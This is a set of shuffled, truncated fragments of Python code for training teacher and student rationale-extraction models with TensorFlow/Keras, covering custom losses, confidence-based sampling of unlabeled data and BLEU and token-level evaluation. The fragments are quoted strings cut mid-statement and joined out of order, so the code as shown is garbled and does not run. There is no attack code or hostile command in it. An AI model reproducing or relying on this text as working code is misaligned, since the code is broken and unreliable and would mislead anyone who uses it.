y_val[indices]", "(student model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set (student model):", "of instances sampled from {} unlabeled instances\".format(sample_size, len(X_unlabeled[\"input_ids\"]))) indices = np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size, replace=False)", "{}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean, y_var, y_T = None, None, None if 'mtl' in type_: acc,", "if os.path.exists(model_file): model.load_weights(model_file) #model_task.load_weights(model_file_task) best_base_model = model logger.info (\"Model file loaded from {}\".format(model_file))", "loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': custom_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': custom_loss_neg}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights)", "= test_task_acc model_file = os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch, sample_scheme)) model_file_task = os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch, sample_scheme)) if", "BinaryFocalLoss, SparseCategoricalFocalLoss import random from sklearn.metrics import f1_score from sklearn.metrics import precision_recall_fscore_support logger", "type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]} if '_neg' in type_:", "'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices] elif 'joint' in type_: X_unlabeled_sample, y_pred = {'input_ids':", "tf.size(y_pred)) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0))", "if 'mtl' in type_: acc, y_pred = model.predict(X_unlabeled_sample, batch_size=256) y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(),", "(\"Evaluating confidence on {} number of instances sampled from {} unlabeled instances\".format(sample_size, len(X_unlabeled[\"input_ids\"])))", "choose all the unlabeled examples\") X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}", "range(len(X_test[\"input_ids\"])): text = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = ' '.join(text) temp['truth'] =", "X_unlabeled[\"attention_mask\"][indices]}, y_pred[indices] else: logger.info (\"Evaluating confidence on {} number of instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample =", "epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev,", "= best_base_model ''' if 'mtl' in type_: logger.info (\"Best validation acc for base", "\"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:], \"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], \"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:] elif 'joint' in type_: X_train, y_train =", "class_acc = model.predict(X_test)[0] test_pred = model.predict(X_test)[1] class_acc = np.argmax(class_acc, axis=-1) elif 'joint' in", "np.argmax(class_acc, axis=-1) logger.info(\"Class predictions shape {}\".format(class_acc.shape)) logger.info(\"Teacher model best score (macro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0],", "'rationale_output_test_teacher_'+type_+'.json'), 'w') as f: json.dump(data, f) model_student = None # model_task for epoch", "(\"X Unlabeled Shape: {}\".format(X_unlabeled[\"input_ids\"].shape)) strategy = tf.distribute.MirroredStrategy() gpus = strategy.num_replicas_in_sync logger.info('Number of devices:", "pred_1, pred_0, truth_1, truth_0 = 0, 0, 0, 0 for i in range(len(test_pred)):", "+= nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 1, 0)) score4 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 0, 1))", "= tp/(tp+fp+0.0000001) r = tp/(tp+fn+0.0000001) logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale coverage (recall): {}\".format(r)) logger.info(\"Token Precision:", "\"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:] else: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size]},", "on the unlabeled set if sample_size < len(X_unlabeled[\"input_ids\"]): logger.info (\"Evaluating confidence on {}", "= model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[4] task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[3] val_loss =", "axis=-1) #logger.info(\"Micro score (task): {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) elif 'joint' in type_: out =", "if '_neg' in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size],", "+ 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) model", "[y_dev[:,0], y_dev[:,1:]], verbose=0)[-1] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] val_loss = model.evaluate(X_dev, [y_dev[:,0],", "= y_train acc, y_pred, r_acc = y_train[:,0], y_train[:,1:], y_train[:,0] y_val = acc y_rat", "out = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.full((len(y_test), len(labels)), 1/len(labels))]) task_acc, test_acc, r_acc =", "(\"Model file loaded from {}\".format(model_file)) continue if 'mtl' in type_ : acc, y_pred", "#y_batch = np.concatenate((acc[indices], y_pred), axis=1) acc = acc[:,None] y_batch = np.concatenate((acc, y_pred), axis=1)", "hidden_dropout_prob=hidden_dropout_prob) loss_weights = [1.0, 1.0, 1.0, 1.0] if '_noexp' in type_: loss_weights =", "max_task_acc = task_acc model.save_weights(model_file_best) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] test_task_acc = model.evaluate(X_test,", "collections import defaultdict from sklearn.utils import shuffle from transformers import * import logging", "{} number of instances sampled from {} unlabeled instances\".format(sample_size, len(X_unlabeled[\"input_ids\"]))) indices = np.random.choice(len(X_unlabeled[\"input_ids\"]),", "acc, y_pred, r_acc = out[0], out[1], out[2] #y_val = np.amax(acc, axis=-1) #y_rat =", "y=[y_batch[:,0], y_batch[:,1:], y_batch[:, 0], np.full((len(y_batch),len(labels)), 1/len(labels))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),", "= tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss +", "custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) model = models.construct_teacher_joint_neg(TFModel, Config,", "'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_mtl(TFModel,", "= model.predict(X_test)[1] class_acc = np.argmax(class_acc, axis=-1) elif 'joint' in type_: out = model.predict(X_test)", "0, 0, 1)) logger.info(\"BLEU-1 score of rationales on test set (student model): {}", "for i in range(len(test_pred)): temp_p, temp_t, ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:]", "task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc model.save_weights(model_file_best) val_acc", "confidence on {} number of instances sampled from {} unlabeled instances\".format(sample_size, len(X_unlabeled[\"input_ids\"]))) indices", "temp_p: if word in temp_t: ct+=1 temp_t.remove(word) else: fp+=1 tp +=ct fn +=", "for task (macro/task): {}\".format(precision_recall_fscore_support(acc1, y_test[:,0], average='macro'))) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev],", "y_val = acc y_rat = np.array(y_pred).astype('float') #y_rat = y_rat[:,1:] #y_pred = y_pred[:,1:] else:", "sample_weight_mode=\"temporal\") model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)])", "logger.info(\"BLEU-4 score of rationales on test set (student model): {} \".format(score4/len(pred))) data =", "axis=-1)))) attention_mask_r[:,0] = 1 negation_mask = np.where(attention_mask_r==0, 1, 0) negation_mask[:,0] = 1 X_sample", "r_acc = out[3], out[4], out[5] logger.info (\"Test token acc for run {} :", "selected: {}\".format(np.mean(np.sum(attention_mask_r, axis=-1)))) attention_mask_r[:,0] = 1 negation_mask = np.where(attention_mask_r==0, 1, 0) negation_mask[:,0] =", "y_pred), axis=1) acc = acc[:,None] y_batch = np.concatenate((acc, y_pred), axis=1) logging.info(\"y_batch shape {}\".format(y_batch.shape))", "1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return", "loss_weights = [1.0, 1.0, 1.0, 1.0] ''' if '_noexp' in type_: loss_weights =", "'.join(text) temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir,", "\"attention_mask\": X[\"attention_mask\"][train_size:]}, y[train_size:] else: X_train, y_train = X, y X_dev, y_dev = X_dev,", "0.00000001) if 'norm' in type_: X_conf[:,0] = tf.nn.softmax(X_conf[:,0], axis=0) if '_r_' in type_:", "'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier': None}, loss_weights=loss_weights) if counter == 0: logger.info(model.summary())", "in type_: acc, y_pred = model_student.predict(X_test) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc,", "'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices] elif 'joint' in type_: X_unlabeled_sample, y_pred", "K import tensorflow.keras.backend as kb import tensorflow_addons as tfa from focal_loss import BinaryFocalLoss,", "\"\"\" Author: <NAME> (<EMAIL>) Code for Self-training for Rationale using few-shot learning. This", "verbose=0)[-3] ''' if val_loss < best_loss: best_loss = val_loss model.save_weights(model_file_best) #_student = deepcopy(model)", "data on student model for run {}: {}\".format(counter, test_pred)) tp, fn, fp =", "restore_best_weights=True)]) # class_weight=class_weight) tf.keras.backend.clear_session() if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to", "task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3]", "else: X_train, y_train = X, y X_dev, y_dev = X_dev, y_dev logger.info(\"X Train", "= out[0], out[1], out[2] #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred", "y_dev[:,0], np.ones(len(y_dev))]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev,", "= None if '_noexp' in type_: loss_weights = [1.0, 0.0] else: loss_weights =", "rationales\") with strategy.scope(): def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true), tf.size(y_pred)) cce_loss", "type_=\"token\", X_dev=None, y_dev=None, task=None): #labels = [0, 1] #fix hardcoding labels = set(y[:,0])", "labels = set(y[:,0]) logger.info (\"Class labels {}\".format(labels)) #split X and y to train", "y_dev[:,0], y_neg_dev], verbose=0)[-3] out1 = model.predict(X_test) acc1, y_pred1, r_acc1 = out1[0], out1[1], out1[2]", "out[0], out[1], out[2] logger.info(\"Raw logits: {}\".format(acc)) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc,", "{} number of instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample = X_unlabeled #X_unlabeled_sample = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices],", "[y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task)", "y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] val_loss", "batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:]]) if 'fine_tune_teacher' in type_: rat_loss = None", "= text temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with", "'joint' in type_: if 'pruthi_' in type_: out = y_train acc, y_pred, r_acc", "max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return float(res) learning_rate_scheduler = tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1) return learning_rate_scheduler def train_model(max_seq_length, X, y,", "rationales on test set (teacher model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on", "np.argmax(acc, axis=-1) elif 'joint' in type_: if 'pruthi_' in type_: out = y_train", "= np.inf for counter in range(N_base): #original N_base=10 with strategy.scope(): if 'mtl' in", "logger.info(\"BLEU-2 score of rationales on test set (teacher model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score", "= ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss =", "= 0.0, 0.0, 0.0, 0.0 for i in range(len(pred)): score1 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1,", "model based on validation loss best_base_model = None best_validation_loss = np.inf for counter", "acc, y_pred, r_acc = out[0], out[1], out[2] logger.info(\"Raw logits: {}\".format(acc)) y_pred = np.argmax(y_pred,", "'mtl' in type_: rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2)", "y_pred1 = np.argmax(y_pred1, axis=-1) acc1 = np.argmax(acc1, axis=-1) r_acc1 = np.argmax(r_acc1, axis=-1) logger.info(\"Model", "max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0)[-3] if '_neg'", "= os.path.join(model_dir, \"model_label.h5\") model_file_task = os.path.join(model_dir, \"model_task.h5\") model_file_best = os.path.join(model_dir, \"model_best.h5\") if os.path.exists(model_file):", "y_pred[indices] if type_ == 'decoupled' or ('joint' in type_): X_sample = {\"input_ids\": X_sample['input_ids'][indices],", "= model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[0] elif '_neg' in type_: out = model.evaluate(X_test, [y_test[:,0],", "validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)]) #, class_weight=class_weight)", "weights=(0, 0, 0, 1)) logger.info(\"BLEU-1 score of rationales on test set (student model):", "103, X_sample[\"input_ids\"][i, 1:]) if '_neg' in type_: X_negation_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i, 1:],", "in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_mtl(TFModel, Config,", "y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0)", "callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #, sample_weight=[X_conf[:,0], X_conf[:,1:]]) elif type_ == 'joint': logger.info(type_) def custom_loss(y_true,", "('joint' in type_): X_sample = {\"input_ids\": X_sample['input_ids'][indices], \"token_type_ids\": X_sample['token_type_ids'][indices], \"attention_mask\": X_sample['attention_mask'][indices]} ''' #acc", "'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg],", "rationales on test set (student model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on", "batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2] #y_val = np.amax(acc, axis=-1) #y_rat", "out[2] #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred, axis=-1)", "counter in range(N_base): #original N_base=10 with strategy.scope(): if 'mtl' in type_: rat_loss =", "np.argmax(r_acc1, axis=-1) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='micro'))) logger.info(\"Model performance for", "np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten()", "X_negation_sample['attention_mask'][indices]} ''' probs = y_val[indices] X_conf = np.ones((len(y_batch), max_seq_length)) X_conf[:,0] = np.log(probs+1e-10)*alpha '''", "'w') as f: json.dump(data, f) model_student = None # model_task for epoch in", "epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance': custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None})", "= y_val[indices] probs_rat = y_rat[indices] cls = list(acc[indices]) logger.info(cls) X_conf = np.ones((len(y_batch), max_seq_length))", "sys import json import nltk import tensorflow as tf import tensorflow.keras as K", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_mtl(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08),", "# class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]) logger.info (\"Validation loss for", "'joint' in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0) elif 'mtl'", "test_acc, r_acc = out[3], out[4], out[5] logger.info (\"Test token acc for run {}", "strategy.scope(): if 'mtl' in type_: rat_loss = None if 'focal' in type_: rat_loss", "0, 1)) logger.info(\"BLEU-1 score of rationales on test set (teacher model): {} \".format(score1/len(pred)))", "X_conf = np.ones((len(y_batch), max_seq_length)) log_probs = (probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale = (probs_rat+1e-10) if 'rwt'", "initialization to select best base model based on validation loss best_base_model = None", "[y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] ''' if val_loss < best_loss: best_loss = val_loss", "elif type_ == 'joint': rat_loss = None if 'focal' in type_: rat_loss =", "'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance': None}) elif 'joint_neg' in type_: rat_loss = None if 'focal' in", "loss_weights=loss_weights) if counter == 0: logger.info(model.summary()) model_file = os.path.join(model_dir, \"model_label.h5\") model_file_task = os.path.join(model_dir,", "0, 0, 0, 0 for i in range(len(test_pred)): temp_p, temp_t, ct = [],[],", "rationales on test set (student model): {} \".format(score4/len(pred))) data = [] for i", "[y_test[:,1:], y_test[:,0], np.full((len(y_test),len(labels)), 1/len(labels))] test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-2] task_acc", "validation acc for base model {}: {}\".format(best_validation_loss, model.evaluate(X_dev, [y_dev[:,0],y_dev[:,1:]]))) ''' if not os.path.exists(model_file):", "if test_task_acc >= max_best_acc: max_best_acc = test_task_acc model_file = os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch, sample_scheme)) model_file_task", "pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #,", "#.flatten() acc = np.argmax(acc, axis=-1) elif 'joint' in type_: if 'pruthi_' in type_:", "data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'), 'w') as f: json.dump(data, f) logger.info (\"Best accuracy (task)", "model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] '''", "model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0) elif 'mtl' in type_: temp = model.evaluate(X_test,", "{'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]} #logger.info (X_unlabeled_sample[\"input_ids\"][:5]) if 'joint' in type_: ids", "best_base_model ''' if 'mtl' in type_: logger.info (\"Best validation acc for base model", "class_acc, test_pred, r_acc = out[0], out[1], out[2] class_acc = np.argmax(class_acc, axis=-1) logger.info(\"Class predictions", "< len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample, y_pred = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices] if", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r']", "'_neg' in type_: X_negation_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": negation_mask} for i", "= indx[:unsup_size] logger.info(\"Shape of predicted labels for class {} : {}\".format(i, len(indx))) indices.extend(indx)", "attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") elif type_ ==", "sample_scheme='easy_bald_class_conf', T=30, alpha=0.1, valid_split=0.5, sup_epochs=70, unsup_epochs=25, N_base=10, dense_dropout=0.5, attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3, test_data=None, unlabeled_data=None, class_weight=None,", "= np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc", "= y_pred[:,1:] # sample from unlabeled set if 'uni' in sample_scheme: logger.info (\"Sampling", "X_conf = np.ones((len(y_batch), max_seq_length)) X_conf[:,0] = np.log(probs+1e-10)*alpha ''' else: logger.info(\"No sampling at the", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task)", "{'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices]", "axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc,", "ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for j in range(0,len(test_pred[0])-1): if test_pred[i][j]", "'mtl' in type_: logger.info(\"y_test: {}\".format(y_test)) test_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[4] task_acc =", "set (student model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test set (student", "acc (task) {}\".format(task_acc)) logger.info (\"Test acc (task) {}\".format(test_task_acc)) if test_task_acc >= max_best_acc: max_best_acc", "'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0],", "task (macro/task): {}\".format(precision_recall_fscore_support(acc1, y_test[:,0], average='macro'))) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[0]", "test_task_acc = model.evaluate(X_test, [y_test[:,0], 